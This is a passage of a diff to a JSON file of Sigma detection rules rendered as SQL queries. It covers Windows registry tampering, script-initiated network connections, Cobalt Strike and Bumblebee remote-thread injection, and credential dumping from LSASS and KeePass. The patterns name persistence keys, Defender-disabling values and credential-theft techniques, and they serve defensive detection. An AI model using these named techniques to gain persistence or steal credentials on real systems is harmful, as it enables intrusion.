"Legitimate applications communicating with the 
Reddit API e.g. web browsers not in the exclusion list, app with an RSS etc." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Tracing\\\\SCM\\\\Regular\\\\TracingDisabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (DestinationHostname LIKE '%reddit.com%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR 
(NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_services_etw_tamper.yml" + "filename": "net_connection_win_reddit_api_non_browser_access.yml" }, { - "title": "Potential Persistence Via CHM Helper DLL", - "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "Python Initiated Connection", + "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Legitimate python script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND NewProcessName LIKE '%python%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND 
CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_python.yml" }, { - "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", - "id": "480421f9-417f-4d3b-9552-fd2728443ec8", + "title": "Script Initiated Connection", + "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((NewValue LIKE '(Empty)' ESCAPE '\\' OR NewValue LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 
'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" + "filename": "net_connection_win_script.yml" }, { - "title": "RDP Sensitive Settings Changed to Zero", - "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1112" + "attack.t1055.001" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\')" ], - "filename": "registry_set_terminal_server_suspicious.yml" + "filename": 
"create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Wow6432Node Classes Autorun Keys Modification", - "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", - "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "status": "experimental", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\'" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": "fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects disabling Windows Defender PUA protection", - "author": "Austin Songer @austinsonger", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - 
Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Bumblebee Remote Thread Creation", + "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "status": "experimental", + "description": "Detects remote thread injection events based on action seen used by bumblebee", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "Session Manager Autorun Keys Modification", - "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", - "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Remote Thread Creation in Suspicious 
Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "status": "experimental", + "description": "Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "attack.t1546.009" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.003" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Potential 
Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", - "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "status": "experimental", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Potential Persistence Via Shim Database Modification", - "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", - "status": "experimental", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows 
Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", - "author": "frack113", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "status": "test", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.t1546.011" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (NewValue = ''))" + "SELECT * FROM logs WHERE (StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_persistence_shim_databases.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "Disable Exploit Guard Network Protection on Windows Defender", - "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", - "status": "experimental", - "description": "Detects disabling Windows Defender Exploit Guard Network Protection", - "author": "Austin Songer @austinsonger", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "status": "test", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - 
"attack.t1562.001" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND NewValue = 'DWORD (00000001)')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Persistence Via Disk Cleanup Handler - Autorun", - "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register 
their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (NewValue LIKE '%cmd%' ESCAPE '\\' OR NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%wsl%' ESCAPE '\\' OR NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\'" ], - "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - 
"description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR 
SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR 
